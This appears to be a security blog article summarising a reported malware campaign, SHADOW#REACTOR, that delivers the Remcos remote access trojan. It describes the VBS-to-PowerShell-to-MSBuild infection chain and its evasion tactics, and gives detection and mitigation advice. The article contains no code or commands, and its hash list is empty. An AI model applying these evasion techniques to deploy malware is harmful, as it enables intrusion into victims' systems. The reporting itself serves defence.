How SHADOW#REACTOR may give-up remote control on Windows system

SHADOW#REACTOR is a multi-stage Windows malware campaign designed to stealthily deploy the Remcos remote access trojan (RAT).

  • 3 mins

A new malware campaign, SHADOW#REACTOR is secretly installing a remote access trojan (RAT), known as Remcos, that allows cybercriminals to control victims’ devices. The attack is using social engineering techniques, such as emails and fake messages, to trick victims.

The attack, discovered by Securonix, begins when the victim clicks on a malicious link sent by email or message. This initial interaction triggers the execution of an overshadowed Visual Basic script called “win64.vbs” through wscript.exe, which is a legitimate component of Windows. This first script sets the stage for the next stages of the attack.

Once executed, the VBS script loads and executes a PowerShell code that was coded in Base64 to make it difficult to analyze. This PowerShell script then establishes communication with a remote server controlled by the attackers using System.Net.WebClient and begins downloading seemingly harmless text files called “qpwoe64.txt” or “qpwoe32.txt”, depending on whether the system is 64 or 32-bit. Files are saved in the temporary Windows directory.

SHADOW#REACTOR is a multi-stage Windows malware campaign designed to stealthily deploy the Remcos remote access trojan (RAT). It employs evasive techniques like obfuscated VBS scripts, PowerShell downloaders, text-only payload staging, and in-memory .NET loading to bypass defenses.

Infection Chain

Contents
1 Infection Chain
2 Key Evasion Tactics
3 Final Payload
4 Indicators of compromise for SHADOW#REACTOR
4.1 Key File Hashes
5 How to protect yourself
6 Mitigation Steps
6.1 More Information ℹ

The attack starts with wscript.exe running an obfuscated VBS launcher, which triggers a PowerShell command to fetch and reassemble encoded text payloads from remote servers. These payloads decode into a .NET Reactor-protected loader that performs anti-analysis checks before handing off to MSBuild.exe for final Remcos RAT execution. Persistence is achieved via autostart registry entries and staged files in user profiles.

Key Evasion Tactics

  • Uses living-off-the-land binaries (LOLBAS) like wscript.exe, powershell.exe, and msbuild.exe to blend with legitimate activity.
  • Relies on text files for payload fragments, fetched repeatedly until complete, to evade static analysis and sandboxes.
  • Employs Base64 obfuscation, reflective .NET loading, and ExecutionPolicy Bypass in PowerShell.

Final Payload

Remcos RAT provides attackers with remote control, including file access, command execution, and surveillance capabilities via an encrypted config. No specific threat actor is attributed yet, but it’s seen as an opportunistic, modular campaign.

Indicators of compromise for SHADOW#REACTOR

SHADOW#REACTOR involves specific indicators of compromise (IOCs) like file hashes, IPs, and behavioral patterns that security teams use to detect infections. These help identify the multi-stage campaign delivering Remcos RAT via text staging and LOLBins.

Key File Hashes

Monitor these SHA256 hashes associated with SHADOW#REACTOR payloads and loaders:

How to protect yourself

Securonix recommends some care that can help prevent falling for scams like this, for example:

  • Increase users’ awareness of script-based threats
  • Educate users about the risks of running downloaded scripts and emphasize caution with unexpected files, fake “update” prompts or documents received via web downloads or untrusted sources;
  • Restrict or monitor the execution of VBS, JS, and PowerShell scripts, particularly those originating from user-recordable locations such as %TEMP%, browser cache directories, or download folders;
  • Ensure that EDR solutions are able to detect suspicious behavior from script interpreters, including anomalous chains of parent-child processes like wscript.exe → powershell.exe → msbuild.exe, and reflective assemblie loading patterns. NET;
  • Enhanced PowerShell logging enablement (ScriptBlock logging, Module logging, command line audit) to identify highly overshadowed payload reconstruction activities in multiple steps;
  • Actively search for misuse of reliable binaries such as wscript.exe, powershell.exe, mshta.exe, and MSBuild.exe, especially when invoked from non-standard runtime paths or unusual user contexts;
  • Monitor suspicious shortcuts in the Startup folder, creation of seemingly benign scheduled and executable tasks written in %TEMP%, ProgramData, or user profile directories.

Mitigation Steps

Isolate affected endpoints, terminate the process chain (wscript.exe → powershell.exe → msbuild.exe), and remove staged files, registry artifacts, and Remcos binaries. Monitor for suspicious PowerShell strings, LOLBAS abuse, and HTTP traffic from scripts to untrusted IPs.

To protect against SHADOW#REACTOR, prioritize isolating infected systems and blocking its evasion tactics like LOLBin abuse and script execution. Implement layered defenses including application controls and behavioral monitoring to halt the infection chain early. Regular audits of startup mechanisms and outbound traffic reduce re-compromise risk.

More Information ℹ
Topics in Article
Gabby
Gabby

Inspiring readers to expound the possibilities of the unfolding World

Newsletter Updates

Enter your email address below and subscribe

Be polite and constructive with your point.

Causes of listing suspension on Google My Business edits and how to resolve them
Rugged smartphones to look for when you are in the market
How to pay for ECG power distribution in Ghana
How to forward emails to a Google Workspace alias to an external email